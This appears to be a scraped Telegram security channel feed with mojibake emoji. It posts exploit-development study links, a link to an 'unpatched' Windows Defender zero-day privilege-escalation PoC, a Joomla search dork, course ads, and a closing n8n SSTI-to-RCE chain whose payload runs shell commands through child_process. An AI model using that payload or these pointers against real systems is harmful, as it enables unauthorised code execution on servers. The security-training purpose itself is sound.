πΈοΈπ’π¦ππ π‘πΌππ²π:
(π’π³π³π²π»ππΆππ² π¦π²π°ππΏπΆππ ππ π½πΉπΌπΆπ ππ²ππ²πΉπΌπ½π²πΏ)
πList:
β’x86 Intel Assembly
β’Portable Executable File Format
β’WinDBG
β’WinDbg Automation with Python
β’IDA
β’Stack Overflows
β’SEH Overflows
β’EggHunters
β’Reverse Engineering For Bugs
β’DEP Bypass
β’ASLR Bypass
β’Format Strings Vulnerabilities
β’Practicing
Link π:-
https://zeyadazima.com/notes/osednotes/
π#infosec #cybersecurity #hacking #pentesting #security
(π’π³π³π²π»ππΆππ² π¦π²π°ππΏπΆππ ππ π½πΉπΌπΆπ ππ²ππ²πΉπΌπ½π²πΏ)
πList:
β’x86 Intel Assembly
β’Portable Executable File Format
β’WinDBG
β’WinDbg Automation with Python
β’IDA
β’Stack Overflows
β’SEH Overflows
β’EggHunters
β’Reverse Engineering For Bugs
β’DEP Bypass
β’ASLR Bypass
β’Format Strings Vulnerabilities
β’Practicing
Link π:-
https://zeyadazima.com/notes/osednotes/
π#infosec #cybersecurity #hacking #pentesting #security
1π₯17β€5π2
Please open Telegram to view this post
VIEW IN TELEGRAM
β€9
π₯ BlueHammer β Windows Defender 0-Day Privilege Escalation PoC
βοΈ Unpatched Windows Zero-Day Exploit (SYSTEM Access)
π GitHub Repository
π https://github.com/Nightmare-Eclipse/BlueHammer
βοΈ Unpatched Windows Zero-Day Exploit (SYSTEM Access)
π GitHub Repository
π https://github.com/Nightmare-Eclipse/BlueHammer
β€7π1
Brut Security
10 Free Coupons - https://topmate.io/saumadip/2009859?coupon_code=awxe
New Contents will be added every month without any extra cost
π΄ LIVE CLASS ALERT β Don't scroll past this.
π» Brut Security is launching a Practical Web Pentesting Live Class β and seats are limited.
ποΈ Starts: May 4
π― Mode: Online (Live)
ββββββββββββββββββ
π οΈ What you'll learn:
β’ SQL Injection, XSS, IDOR, SSRF
β’ Authentication & Access Control Bypass
β’ CSRF, File Upload Attacks
β’ Burp Suite from scratch
β’ Recon, API Hacking & Reporting
ββββββββββββββββββ
This isn't a pre-recorded course. This is LIVE β ask questions, break things in real time, and learn the way actual pentesters do.
β Beginner friendly
β Hands-on labs
β Certificate on completion
π Enroll now β http://wa.link/brutsecurity
β‘ Spots fill fast. Don't wait.
#BrutSecurity #WebPentesting #EthicalHacking #BugBounty #Cybersecurity #LiveClass
π» Brut Security is launching a Practical Web Pentesting Live Class β and seats are limited.
ποΈ Starts: May 4
π― Mode: Online (Live)
ββββββββββββββββββ
π οΈ What you'll learn:
β’ SQL Injection, XSS, IDOR, SSRF
β’ Authentication & Access Control Bypass
β’ CSRF, File Upload Attacks
β’ Burp Suite from scratch
β’ Recon, API Hacking & Reporting
ββββββββββββββββββ
This isn't a pre-recorded course. This is LIVE β ask questions, break things in real time, and learn the way actual pentesters do.
β Beginner friendly
β Hands-on labs
β Certificate on completion
π Enroll now β http://wa.link/brutsecurity
β‘ Spots fill fast. Don't wait.
#BrutSecurity #WebPentesting #EthicalHacking #BugBounty #Cybersecurity #LiveClass
β€4
π¨ CVE-2026-23898 & CVE-2026-23899: Critical File Deletion and Webservice Flaws Exposed in Joomla.
πDorks
HUNTER : http://product.name="Joomla"
πDorks
HUNTER : http://product.name="Joomla"
β€4
π¨ Bug Bounty Recon Methodology π π
Link: https://github.com/Maniesh-Neupane/BugBounty-Recon-Methodology
Link: https://github.com/Maniesh-Neupane/BugBounty-Recon-Methodology
Please open Telegram to view this post
VIEW IN TELEGRAM
β€11
10 Free Coupons For New Members who joined our group https://topmate.io/saumadip/2009859?coupon_code=awxe
topmate.io
Bug Bounty Masterclass with Saumadip Mandal
Beginner to bug bounty hunter β tools, recon & real PoCs.
β€2
What content/information you're looking for do let me know in comments below. I will try as much possible to share π
Please open Telegram to view this post
VIEW IN TELEGRAM
π3
π Summer Batch Announcement β For Students Only
This summer, Iβm starting a 1-month live training program focused on:
β’ Ethical Hacking
β’ Bug Bounty Hunting
β’ Web Penetration Testing
π Students only (Student ID mandatory for enrollment)
π» Live Classes
π Duration: 1 Month
π Certificate included (Ethical Hacking + Web Pentesting)
π° Price:
βΉ4999 (India)
$89 (International)
π© DM to enroll or get details.
This summer, Iβm starting a 1-month live training program focused on:
β’ Ethical Hacking
β’ Bug Bounty Hunting
β’ Web Penetration Testing
π Students only (Student ID mandatory for enrollment)
π» Live Classes
π Duration: 1 Month
π Certificate included (Ethical Hacking + Web Pentesting)
π° Price:
βΉ4999 (India)
$89 (International)
π© DM to enroll or get details.
π€¨3β€2
π¨ *APIStrike is live!* β API Security Scanner by RevoltSecurities
Automate your API pentesting. Point it at an OpenAPI spec, it handles the rest.
*What hits:*
β‘ OWASP API Top 10 coverage
π― DAST fuzzing β SQLi, XSS, SSRF, SSTI, CMDi & more
π Auth-aware β JWT, Basic, API key, Cookie bypass
π CI/CD gate β blocks deploys on critical findings
https://github.com/RevoltSecurities/apistrike
β Star it. Share it. Break APIs legally.
Automate your API pentesting. Point it at an OpenAPI spec, it handles the rest.
*What hits:*
β‘ OWASP API Top 10 coverage
π― DAST fuzzing β SQLi, XSS, SSRF, SSTI, CMDi & more
π Auth-aware β JWT, Basic, API key, Cookie bypass
π CI/CD gate β blocks deploys on critical findings
https://github.com/RevoltSecurities/apistrike
β Star it. Share it. Break APIs legally.
GitHub
GitHub - RevoltSecurities/apistrike
Contribute to RevoltSecurities/apistrike development by creating an account on GitHub.
β€5π₯4
Please open Telegram to view this post
VIEW IN TELEGRAM
2π₯10β€5
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!
Zero Click Unauthenticated RCE in n8n (CVE-2026-27493)
The chain exploitation method is:
1. Allow User input
2. Render the user input on browser
3. SSTI exploitation e.g. {{7*7}}
4. SSTI to RCE payload e.g.
If you guys are really enjoy to read, then show your love β€οΈ
#rce #ssti #n8n
DarkShadow is here back again!
Zero Click Unauthenticated RCE in n8n (CVE-2026-27493)
The chain exploitation method is:
1. Allow User input
2. Render the user input on browser
3. SSTI exploitation e.g. {{7*7}}
4. SSTI to RCE payload e.g.
={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id").toString()')()}}
If you guys are really enjoy to read, then show your love β€οΈ
#rce #ssti #n8n
β€17π5